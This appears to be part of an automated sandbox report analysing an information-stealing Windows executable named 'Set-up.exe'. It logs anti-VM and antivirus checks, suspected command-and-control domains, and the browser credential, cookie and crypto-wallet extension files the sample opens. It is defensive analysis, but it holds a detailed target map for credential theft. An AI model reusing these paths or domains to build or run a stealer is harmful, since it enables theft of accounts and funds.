              Source: C:\Users\user\Desktop\'Set-up.exeCode function: 0_3_0374CE24 pushad ; ret 0_3_0374CE3D
              Source: C:\Users\user\Desktop\'Set-up.exeCode function: 0_3_0374CE24 pushad ; ret 0_3_0374CE3D
              Source: C:\Users\user\Desktop\'Set-up.exeCode function: 0_3_0374B2BC push eax; ret 0_3_0374B381
              Source: C:\Users\user\Desktop\'Set-up.exeCode function: 0_3_0374B2BC push eax; ret 0_3_0374B381
              Source: C:\Users\user\Desktop\'Set-up.exeCode function: 0_3_00994913 pushfd ; retf 0068h0_3_0099492A
              Source: C:\Users\user\Desktop\'Set-up.exeCode function: 0_3_0099AD78 push 780099C3h; ret 0_3_0099AD7D
              Source: C:\Users\user\Desktop\'Set-up.exeCode function: 0_3_0099AD78 push 780099C3h; ret 0_3_0099AD7D
              Source: C:\Users\user\Desktop\'Set-up.exeCode function: 0_3_0099AD78 push 780099C3h; ret 0_3_0099AD7D
              Source: C:\Users\user\Desktop\'Set-up.exeCode function: 0_3_0092CBA2 push esp; retf 0_3_0092CC00
              Source: C:\Users\user\Desktop\'Set-up.exeCode function: 0_3_009310AE push eax; retf 0_3_00931191
              Source: C:\Users\user\Desktop\'Set-up.exeCode function: 0_3_0093B613 push es; ret 0_3_0093B6F9
              Source: C:\Users\user\Desktop\'Set-up.exeCode function: 0_3_0092CB52 push eax; retf 0_3_0092CB61
              Source: C:\Users\user\Desktop\'Set-up.exeCode function: 0_3_0092CF70 pushad ; iretd 0_3_0092CF71
              Source: C:\Users\user\Desktop\'Set-up.exeCode function: 0_3_0092CB62 pushad ; retf 0_3_0092CB71
              Source: C:\Users\user\Desktop\'Set-up.exeCode function: 0_3_0092CF60 push eax; iretd 0_3_0092CF61
              Source: C:\Users\user\Desktop\'Set-up.exeCode function: 0_3_0094E138 push eax; iretd 0_3_0094E139
              Source: C:\Users\user\Desktop\'Set-up.exeCode function: 0_3_0095312C push esp; retf 0_3_00953131
              Source: C:\Users\user\Desktop\'Set-up.exeCode function: 0_3_009470C7 push C8050000h; ret 0_3_009470D0
              Source: C:\Users\user\Desktop\'Set-up.exeCode function: 0_3_0099AD78 push 780099C3h; ret 0_3_0099AD7D
              Source: C:\Users\user\Desktop\'Set-up.exeCode function: 0_3_0099AD78 push 780099C3h; ret 0_3_0099AD7D
              Source: C:\Users\user\Desktop\'Set-up.exeCode function: 0_3_0099AD78 push 780099C3h; ret 0_3_0099AD7D
              Source: C:\Users\user\Desktop\'Set-up.exeCode function: 0_3_0099AD78 push 780099C3h; ret 0_3_0099AD7D
              Source: C:\Users\user\Desktop\'Set-up.exeCode function: 0_3_0099AD78 push 780099C3h; ret 0_3_0099AD7D
              Source: C:\Users\user\Desktop\'Set-up.exeCode function: 0_3_0099AD78 push 780099C3h; ret 0_3_0099AD7D
              Source: C:\Users\user\Desktop\'Set-up.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\'Set-up.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\'Set-up.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exe TID: 3088Thread sleep time: -150000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exe TID: 2996Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: 'Set-up.exe, 00000000.00000003.2301804314.0000000003796000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
              Source: 'Set-up.exe, 00000000.00000003.2301804314.0000000003796000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
              Source: 'Set-up.exe, 00000000.00000003.2301804314.0000000003796000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
              Source: 'Set-up.exe, 00000000.00000003.2301804314.0000000003796000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
              Source: 'Set-up.exe, 00000000.00000003.2301804314.0000000003796000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
              Source: 'Set-up.exe, 00000000.00000003.2301804314.0000000003796000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
              Source: 'Set-up.exe, 'Set-up.exe, 00000000.00000003.2458003560.000000000092C000.00000004.00000020.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000002.2458846850.0000000000904000.00000004.00000020.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2430635744.000000000092C000.00000004.00000020.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2458113896.000000000092E000.00000004.00000020.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000002.2458916538.000000000092F000.00000004.00000020.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2419435129.000000000092C000.00000004.00000020.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2419615846.000000000092E000.00000004.00000020.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2289335741.000000000092C000.00000004.00000020.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2457690210.0000000000904000.00000004.00000020.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2289458694.000000000092E000.00000004.00000020.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2430843387.000000000092E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: 'Set-up.exe, 00000000.00000003.2301804314.0000000003796000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
              Source: 'Set-up.exe, 00000000.00000003.2301804314.0000000003796000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
              Source: 'Set-up.exe, 00000000.00000003.2301804314.000000000379B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696487552p
              Source: 'Set-up.exe, 00000000.00000003.2301804314.0000000003796000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
              Source: 'Set-up.exe, 00000000.00000003.2301804314.0000000003796000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
              Source: 'Set-up.exe, 00000000.00000003.2301804314.0000000003796000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
              Source: 'Set-up.exe, 00000000.00000003.2301804314.0000000003796000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
              Source: 'Set-up.exe, 00000000.00000003.2301804314.0000000003796000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
              Source: 'Set-up.exe, 00000000.00000003.2301804314.0000000003796000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
              Source: 'Set-up.exe, 00000000.00000003.2301804314.0000000003796000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
              Source: 'Set-up.exe, 00000000.00000003.2301804314.0000000003796000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
              Source: 'Set-up.exe, 00000000.00000003.2301804314.0000000003796000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
              Source: 'Set-up.exe, 00000000.00000003.2301804314.0000000003796000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
              Source: 'Set-up.exe, 00000000.00000003.2301804314.0000000003796000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
              Source: 'Set-up.exe, 00000000.00000003.2301804314.0000000003796000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
              Source: 'Set-up.exe, 00000000.00000003.2301804314.0000000003796000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
              Source: 'Set-up.exe, 00000000.00000003.2301804314.0000000003796000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
              Source: 'Set-up.exe, 00000000.00000003.2301804314.0000000003796000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
              Source: 'Set-up.exe, 00000000.00000003.2301804314.0000000003796000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
              Source: 'Set-up.exe, 00000000.00000003.2301804314.0000000003796000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
              Source: 'Set-up.exe, 00000000.00000003.2301804314.0000000003796000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
              Source: 'Set-up.exe, 00000000.00000003.2301804314.0000000003796000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
              Source: 'Set-up.exe, 00000000.00000003.2301804314.0000000003796000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
              Source: 'Set-up.exe, 00000000.00000003.2301804314.0000000003796000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
              Source: 'Set-up.exe, 00000000.00000003.2301804314.0000000003796000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
              Source: 'Set-up.exe, 00000000.00000003.2301804314.0000000003796000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
              Source: C:\Users\user\Desktop\'Set-up.exeProcess information queried: ProcessInformationJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: 'Set-up.exe, 00000000.00000002.2459089767.00000000023D0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: cloudewahsj.shop
              Source: 'Set-up.exe, 00000000.00000002.2459089767.00000000023D0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: rabidcowse.shop
              Source: 'Set-up.exe, 00000000.00000002.2459089767.00000000023D0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: noisycuttej.shop
              Source: 'Set-up.exe, 00000000.00000002.2459089767.00000000023D0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: tirepublicerj.shop
              Source: 'Set-up.exe, 00000000.00000002.2459089767.00000000023D0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: framekgirus.shop
              Source: 'Set-up.exe, 00000000.00000002.2459089767.00000000023D0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: wholersorie.shop
              Source: 'Set-up.exe, 00000000.00000002.2459089767.00000000023D0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: abruptyopsn.shop
              Source: 'Set-up.exe, 00000000.00000002.2459089767.00000000023D0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: nearycrepso.shop
              Source: 'Set-up.exe, 00000000.00000002.2459089767.00000000023D0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: passhudmrue.click
              Source: C:\Users\user\Desktop\'Set-up.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: 'Set-up.exe, 00000000.00000003.2458003560.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2430635744.0000000000917000.00000004.00000020.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000002.2458864912.0000000000917000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\'Set-up.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: Process Memory Space: 'Set-up.exe PID: 3940, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: 'Set-up.exeString found in binary or memory: *electrum*
              Source: 'Set-up.exeString found in binary or memory: %appdata%\ElectronCash\wallets
              Source: 'Set-up.exeString found in binary or memory: Wallets/JAXX New Version
              Source: 'Set-up.exeString found in binary or memory: window-state.json
              Source: 'Set-up.exeString found in binary or memory: %appdata%\Exodus\exodus.wallet
              Source: 'Set-up.exeString found in binary or memory: *exodus*
              Source: 'Set-up.exeString found in binary or memory: *ethereum*
              Source: 'Set-up.exe, 00000000.00000003.2419404613.0000000000990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: 'Set-up.exe, 00000000.00000003.2419642946.00000000009A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: o","ez":"UniSat"},{"en":"cpojfbodiccabbabgimdeohkkpjfpbnf","ez":"Rainbow"},{"en":"jiidiaalihmmhddjgbnbgdfflelocpak","ez":"Bitget Wallet"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p"86
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
